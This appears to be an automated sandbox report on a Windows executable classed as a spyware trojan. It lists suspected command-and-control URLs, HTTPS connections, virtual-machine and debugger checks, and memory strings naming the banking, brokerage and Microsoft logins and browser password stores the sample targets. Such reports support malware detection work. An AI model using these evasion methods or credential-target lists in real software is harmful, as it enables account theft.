              Source: 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steambroadcast.akamaized.net
              Source: 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steambroadcastchat.akamaized.net
              Source: 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/discussions/
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
              Source: 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/market/
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/my/wishlist/
              Source: 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
              Source: 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900a
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/workshop/
              Source: 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/
              Source: 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/;
              Source: 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb
              Source: 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/about/
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/explore/
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/legal/
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/mobile
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/news/
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/points/shop/
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/privacy_agreement/
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/stats/
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/steam_refunds/
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
              Source: 8ZVMneG.exe, 00000003.00000003.2377179600.0000000003D36000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: 8ZVMneG.exe, 00000003.00000003.2377179600.0000000003D36000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://wrathful-jammy.cyou/
              Source: 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://wrathful-jammy.cyou/em
              Source: 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://wrathful-jammy.cyou/t
              Source: 8ZVMneG.exe, 00000003.00000003.2331522501.0000000003C5C000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2331680839.0000000003C5A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
              Source: 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2402934236.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com
              Source: 8ZVMneG.exe, 00000003.00000003.2331522501.0000000003C5C000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2331680839.0000000003C5A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/recaptcha/
              Source: 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.cn/recaptcha/
              Source: 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com/recaptcha/
              Source: 8ZVMneG.exe, 00000003.00000003.2377108126.0000000003C4D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.or
              Source: 8ZVMneG.exe, 00000003.00000003.2377108126.0000000003C4D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org
              Source: 8ZVMneG.exe, 00000003.00000003.2377179600.0000000003D36000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
              Source: 8ZVMneG.exe, 00000003.00000003.2377179600.0000000003D36000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
              Source: 8ZVMneG.exe, 00000003.00000003.2377179600.0000000003D36000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
              Source: 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com
              Source: 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com/
              Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49721
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49754
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49765
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49760
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49771
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49781
              Source: unknown | Network traffic detected: HTTP traffic on port 49748 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49760 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49765 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49781 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49721 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49748
              Source: unknown | Network traffic detected: HTTP traffic on port 49754 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49771 -> 443
              Source: unknown | HTTPS traffic detected: 178.62.201.34:443 -> 192.168.2.6:49708 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 178.62.201.34:443 -> 192.168.2.6:49710 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.6:49721 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49730 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49737 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49748 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49754 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49760 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49765 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49771 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49781 version: TLS 1.2
              Source: C:\Users\user\Desktop\8ZVMneG.exe | Code function: 0_2_00EF5000 | 0_2_00EF5000
              Source: C:\Users\user\Desktop\8ZVMneG.exe | Code function: 0_2_00EE29F2 | 0_2_00EE29F2
              Source: C:\Users\user\Desktop\8ZVMneG.exe | Code function: 0_2_00ECB2B8 | 0_2_00ECB2B8
              Source: C:\Users\user\Desktop\8ZVMneG.exe | Code function: 0_2_00EE0C16 | 0_2_00EE0C16
              Source: C:\Users\user\Desktop\8ZVMneG.exe | Code function: 0_2_00ED5790 | 0_2_00ED5790
              Source: C:\Users\user\Desktop\8ZVMneG.exe | Code function: 0_2_00ECFF5A | 0_2_00ECFF5A
              Source: C:\Users\user\Desktop\8ZVMneG.exe | Code function: String function: 00ECB7C0 appears 47 times
              Source: 8ZVMneG.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: 8ZVMneG.exe | Static PE information: Section: .bss ZLIB complexity 1.0003407005613125
              Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@4/0@13/3
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1916:120:WilError_03
              Source: C:\Users\user\Desktop\8ZVMneG.exe | Command line argument: ~q | 0_2_00ED70D0
              Source: C:\Users\user\Desktop\8ZVMneG.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: 8ZVMneG.exe, 00000003.00000003.2333691545.0000000003C2A000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2333538909.0000000003C47000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2355216686.0000000003C47000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: 8ZVMneG.exe | Virustotal: Detection: 65%
              Source: 8ZVMneG.exe | ReversingLabs: Detection: 71%
              Source: C:\Users\user\Desktop\8ZVMneG.exe | File read: C:\Users\user\Desktop\8ZVMneG.exe
              Source: unknown | Process created: C:\Users\user\Desktop\8ZVMneG.exe "C:\Users\user\Desktop\8ZVMneG.exe"
              Source: C:\Users\user\Desktop\8ZVMneG.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\8ZVMneG.exe | Process created: C:\Users\user\Desktop\8ZVMneG.exe "C:\Users\user\Desktop\8ZVMneG.exe"
              Source: C:\Users\user\Desktop\8ZVMneG.exe | Section loaded: apphelp.dll
              Source: C:\Users\user\Desktop\8ZVMneG.exe | Section loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\8ZVMneG.exe | Section loaded: cryptsp.dll
              Source: C:\Users\user\Desktop\8ZVMneG.exe | Section loaded: windows.storage.dll
              Source: C:\Users\user\Desktop\8ZVMneG.exe | Section loaded: wldp.dll
              Source: C:\Users\user\Desktop\8ZVMneG.exe | Section loaded: winhttp.dll
              Source: C:\Users\user\Desktop\8ZVMneG.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\Desktop\8ZVMneG.exe | Section loaded: webio.dll
              Source: C:\Users\user\Desktop\8ZVMneG.exe | Section loaded: mswsock.dll
              Source: C:\Users\user\Desktop\8ZVMneG.exe | Section loaded: iphlpapi.dll
              Source: C:\Users\user\Desktop\8ZVMneG.exe | Section loaded: winnsi.dll
              Source: C:\Users\user\Desktop\8ZVMneG.exe | Section loaded: sspicli.dll
              Source: C:\Users\user\Desktop\8ZVMneG.exe | Section loaded: dnsapi.dll
              Source: C:\Users\user\Desktop\8ZVMneG.exe | Section loaded: rasadhlp.dll
              Source: C:\Users\user\Desktop\8ZVMneG.exe | Section loaded: fwpuclnt.dll
              Source: C:\Users\user\Desktop\8ZVMneG.exe | Section loaded: schannel.dll
              Source: C:\Users\user\Desktop\8ZVMneG.exe | Section loaded: mskeyprotect.dll
              Source: C:\Users\user\Desktop\8ZVMneG.exe | Section loaded: ntasn1.dll
              Source: C:\Users\user\Desktop\8ZVMneG.exe | Section loaded: ncrypt.dll
              Source: C:\Users\user\Desktop\8ZVMneG.exe | Section loaded: ncryptsslp.dll
              Source: C:\Users\user\Desktop\8ZVMneG.exe | Section loaded: msasn1.dll
              Source: C:\Users\user\Desktop\8ZVMneG.exe | Section loaded: rsaenh.dll
              Source: C:\Users\user\Desktop\8ZVMneG.exe | Section loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\8ZVMneG.exe | Section loaded: gpapi.dll
              Source: C:\Users\user\Desktop\8ZVMneG.exe | Section loaded: dpapi.dll
              Source: C:\Users\user\Desktop\8ZVMneG.exe | Section loaded: uxtheme.dll
              Source: C:\Users\user\Desktop\8ZVMneG.exe | Section loaded: wbemcomn.dll
              Source: C:\Users\user\Desktop\8ZVMneG.exe | Section loaded: amsi.dll
              Source: C:\Users\user\Desktop\8ZVMneG.exe | Section loaded: userenv.dll
              Source: C:\Users\user\Desktop\8ZVMneG.exe | Section loaded: profapi.dll
              Source: C:\Users\user\Desktop\8ZVMneG.exe | Section loaded: version.dll
              Source: 8ZVMneG.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, TERMINAL_SERVER_AWARE
              Source: 8ZVMneG.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: 8ZVMneG.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: 8ZVMneG.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: 8ZVMneG.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: 8ZVMneG.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
              Source: 8ZVMneG.exe | Static PE information: section name: .CODE
              Source: C:\Users\user\Desktop\8ZVMneG.exe | Code function: 0_2_00ECB97A push ecx; ret | 0_2_00ECB98D
              Source: C:\Users\user\Desktop\8ZVMneG.exe | Code function: 3_3_0141C440 push eax; ret | 3_3_0141C441
              Source: C:\Users\user\Desktop\8ZVMneG.exe | Code function: 3_3_0141BE28 push edx; ret | 3_3_0141BE29
              Source: C:\Users\user\Desktop\8ZVMneG.exe | Code function: 3_3_01420FEA push ebp; ret | 3_3_01420FEB
Source: C:\Users\user\Desktop\8ZVMneG.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\Desktop\8ZVMneG.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\8ZVMneG.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\8ZVMneG.exe | System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\8ZVMneG.exe TID: 1492 | Thread sleep time: -240000s >= -30000s
Source: C:\Users\user\Desktop\8ZVMneG.exe TID: 5780 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\8ZVMneG.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\Desktop\8ZVMneG.exe | Code function: 0_2_00EDD2A7 FindFirstFileExW,0_2_00EDD2A7
Source: C:\Users\user\Desktop\8ZVMneG.exe | Code function: 0_2_00EDD358 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00EDD358
Source: 8ZVMneG.exe, 00000003.00000003.2354925404.0000000003C60000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: 8ZVMneG.exe, 00000003.00000003.2354925404.0000000003C60000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: 8ZVMneG.exe, 00000003.00000003.2354925404.0000000003C60000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: 8ZVMneG.exe, 00000003.00000003.2354925404.0000000003C60000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696487552f
Source: 8ZVMneG.exe, 00000003.00000003.2354925404.0000000003C60000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: 8ZVMneG.exe, 00000003.00000003.2483528838.000000000136C000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000002.2484524234.000000000136C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWp
Source: 8ZVMneG.exe, 00000003.00000003.2354925404.0000000003C60000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: 8ZVMneG.exe, 00000003.00000002.2484637162.00000000013B6000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2440225330.00000000013B6000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2427807404.00000000013B6000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2483778671.00000000013B6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: 8ZVMneG.exe, 00000003.00000003.2354925404.0000000003C60000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: 8ZVMneG.exe, 00000003.00000003.2354925404.0000000003C60000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: 8ZVMneG.exe, 00000003.00000003.2354821190.0000000003C6D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: - GDCDYNVMware20,11696487552p
Source: 8ZVMneG.exe, 00000003.00000003.2354925404.0000000003C60000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: 8ZVMneG.exe, 00000003.00000003.2354925404.0000000003C60000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696487552
Source: 8ZVMneG.exe, 00000003.00000003.2354925404.0000000003C60000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696487552o
Source: 8ZVMneG.exe, 00000003.00000003.2354925404.0000000003C60000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696487552
Source: 8ZVMneG.exe, 00000003.00000003.2354925404.0000000003C60000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: 8ZVMneG.exe, 00000003.00000003.2354925404.0000000003C60000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: 8ZVMneG.exe, 00000003.00000003.2354925404.0000000003C60000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696487552j
Source: 8ZVMneG.exe, 00000003.00000003.2354925404.0000000003C60000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: 8ZVMneG.exe, 00000003.00000003.2354925404.0000000003C60000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: 8ZVMneG.exe, 00000003.00000003.2354925404.0000000003C60000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: 8ZVMneG.exe, 00000003.00000003.2354925404.0000000003C60000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: 8ZVMneG.exe, 00000003.00000003.2354925404.0000000003C60000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: 8ZVMneG.exe, 00000003.00000003.2354925404.0000000003C60000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: 8ZVMneG.exe, 00000003.00000003.2354925404.0000000003C60000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: 8ZVMneG.exe, 00000003.00000003.2354925404.0000000003C60000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: 8ZVMneG.exe, 00000003.00000003.2354925404.0000000003C60000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: 8ZVMneG.exe, 00000003.00000003.2354925404.0000000003C60000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: 8ZVMneG.exe, 00000003.00000003.2354925404.0000000003C60000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696487552s
Source: 8ZVMneG.exe, 00000003.00000003.2354925404.0000000003C60000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: 8ZVMneG.exe, 00000003.00000003.2354925404.0000000003C60000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: 8ZVMneG.exe, 00000003.00000003.2354925404.0000000003C60000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: 8ZVMneG.exe, 00000003.00000003.2354925404.0000000003C60000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: 8ZVMneG.exe, 00000003.00000003.2354925404.0000000003C60000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: C:\Users\user\Desktop\8ZVMneG.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\8ZVMneG.exe | Code function: 0_2_00ED3C11 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00ED3C11
Source: C:\Users\user\Desktop\8ZVMneG.exe | Code function: 0_2_00EF21A9 mov edi, dword ptr fs:[00000030h] 0_2_00EF21A9
Source: C:\Users\user\Desktop\8ZVMneG.exe | Code function: 0_2_00EF55D0 mov edi, dword ptr fs:[00000030h] 0_2_00EF55D0
